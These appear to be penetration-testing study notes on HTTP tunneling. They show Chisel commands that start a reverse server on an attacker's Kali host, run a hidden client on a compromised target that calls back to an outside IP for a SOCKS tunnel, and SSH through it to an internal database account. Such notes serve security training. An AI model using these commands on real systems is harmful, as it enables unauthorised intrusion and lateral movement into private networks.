3. HTTP Tunneling


Chisel HTTP Dynamic/Reverse Port Forwarding + SSH with SOCKS:

  1. Get correct binary to target machine from https://github.com/jpillora/chisel/releases/
  2. Start Chisel server on kali:
chisel server --port 8080 --reverse
  1. Connect to server using Chisel client:
/tmp/chisel client 192.168.45.180:8080 R:socks > /dev/null 2>&1 &
  1. Connect using SOCKS and win!
  2. SSH with SOCKS using ncat:
ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' database_admin@10.4.50.215